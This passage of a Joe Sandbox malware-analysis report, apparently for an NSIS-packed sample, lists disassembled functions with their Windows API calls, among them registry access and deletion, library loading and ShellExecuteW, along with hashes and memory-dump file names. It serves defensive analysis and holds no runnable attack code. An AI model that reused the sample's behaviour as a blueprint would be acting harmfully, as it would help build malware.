                                                                                                    • Instruction ID: 4a61f6f80671d808dc41601989bb6c43c22881685a3a15352730304741b477df
                                                                                                    • Opcode Fuzzy Hash: 544fe90661504b3f73bb457df6893ab302009ecc2b1f879340368463567d4392
                                                                                                    • Instruction Fuzzy Hash: 10714771E04228CFEF24CFA8C894BADBBB1FB44305F15806AD856BB281C7785956DF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62b97cb57a72ce22a6d8feb282019d17567d0fea9520e3f831b09b876e97210d
                                                                                                    • Instruction ID: f5c122442136fd671463674f3a0102546b50c27f43e6df69360a8f4413a57d7a
                                                                                                    • Opcode Fuzzy Hash: 62b97cb57a72ce22a6d8feb282019d17567d0fea9520e3f831b09b876e97210d
                                                                                                    • Instruction Fuzzy Hash: 63715771E04228CBEF24CF98C884BADBBB1FB45305F15806AE856BB291C7785A56DF44
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                      • Part of subcall function 00405021: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                      • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                      • Part of subcall function 00405021: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                      • Part of subcall function 00405021: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll), ref: 0040508E
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 334405425-0
                                                                                                    • Opcode ID: 0b89ead58d390ff17d881e3191b7456e368a4c726051eef4ac93ade2398fe5f3
                                                                                                    • Instruction ID: a11216cf4d9ed69530e7a3120e2c7e0776abe0d849fb671ec08c4598754a23ed
                                                                                                    • Opcode Fuzzy Hash: 0b89ead58d390ff17d881e3191b7456e368a4c726051eef4ac93ade2398fe5f3
                                                                                                    • Instruction Fuzzy Hash: 2821B671904215F6CF206F95CE48ADE7AB4AB04358F70417BF611B51E0C7B98D81DA6D
                                                                                                    APIs
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree
                                                                                                    • String ID: Call
                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                    • Opcode ID: 964461071e6e80e359c9697dbfefeb40b1bd3ce1e0a189f69a8cb19f70afb2f2
                                                                                                    • Instruction ID: 0e9c0b35001f1033de5fa53c21d3cf865b558ccbe2596cbe26b498a02803ad8f
                                                                                                    • Opcode Fuzzy Hash: 964461071e6e80e359c9697dbfefeb40b1bd3ce1e0a189f69a8cb19f70afb2f2
                                                                                                    • Instruction Fuzzy Hash: 32219CB2600504A7CB10EB94DE85D6EB3A4EF44318B20443BF101B72E1D77C98458F5D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Enum$CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 167947723-0
                                                                                                    • Opcode ID: 0ef88ddf6a77f3597932d5f5950ccac7ebba6e42faf31082df8434657d37fe38
                                                                                                    • Instruction ID: 9b4534643d4666439fb6e7fa0780ec568e551195bda58a6737a49a93b172aaf7
                                                                                                    • Opcode Fuzzy Hash: 0ef88ddf6a77f3597932d5f5950ccac7ebba6e42faf31082df8434657d37fe38
                                                                                                    • Instruction Fuzzy Hash: 7EF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D6B85D419B2A
                                                                                                    APIs
                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Program Files (x86)\shaw,?), ref: 00401E3D
                                                                                                    Strings
                                                                                                    • C:\Program Files (x86)\shaw, xrefs: 00401E26
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteShell
                                                                                                    • String ID: C:\Program Files (x86)\shaw
                                                                                                    • API String ID: 587946157-209812835
                                                                                                    • Opcode ID: 7587e70040bd90d9a45c77b38d5a8326e6407a8cac713d4af707f877f72f6e69
                                                                                                    • Instruction ID: 1d84af77b3b092231a8c26a4bbf5194ed9fa03af7e80c3faa1f479241ca17973
                                                                                                    • Opcode Fuzzy Hash: 7587e70040bd90d9a45c77b38d5a8326e6407a8cac713d4af707f877f72f6e69
                                                                                                    • Instruction Fuzzy Hash: 5EF0C275B14200BACB006FB59D4AF9E73B8AB24729F300936F402F70D1D6FC88419628
                                                                                                    APIs
                                                                                                      • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3677997916-0
                                                                                                    • Opcode ID: 65fa667fb9a4e770228c9edaf60a266106b1654de64b854c0c014628474dfe3e
                                                                                                    • Instruction ID: 1209522b8d3984a6b4610ed026cffc7dab670339dbbb9e9ecb5883d5f24cd4f7
                                                                                                    • Opcode Fuzzy Hash: 65fa667fb9a4e770228c9edaf60a266106b1654de64b854c0c014628474dfe3e
                                                                                                    • Instruction Fuzzy Hash: D5117371915205EEDF14CFA0C6889AFB7B4EF44359F20843FE042A72D0D7B85A41DB5A
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 3b73f58598246971e780ef50935e80d1208b404ce952b395e35e3e50ed7a2881
                                                                                                    • Instruction ID: a30e82e9015a098eeac925556b61d7d627792a5c50f4ab7e1fdfecd72b7c1cbe
                                                                                                    • Opcode Fuzzy Hash: 3b73f58598246971e780ef50935e80d1208b404ce952b395e35e3e50ed7a2881
                                                                                                    • Instruction Fuzzy Hash: BE01D131B24210ABE7295B389C09B6A3698E710314F54863EB911F72F1DA78DC139B49
                                                                                                    APIs
                                                                                                      • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
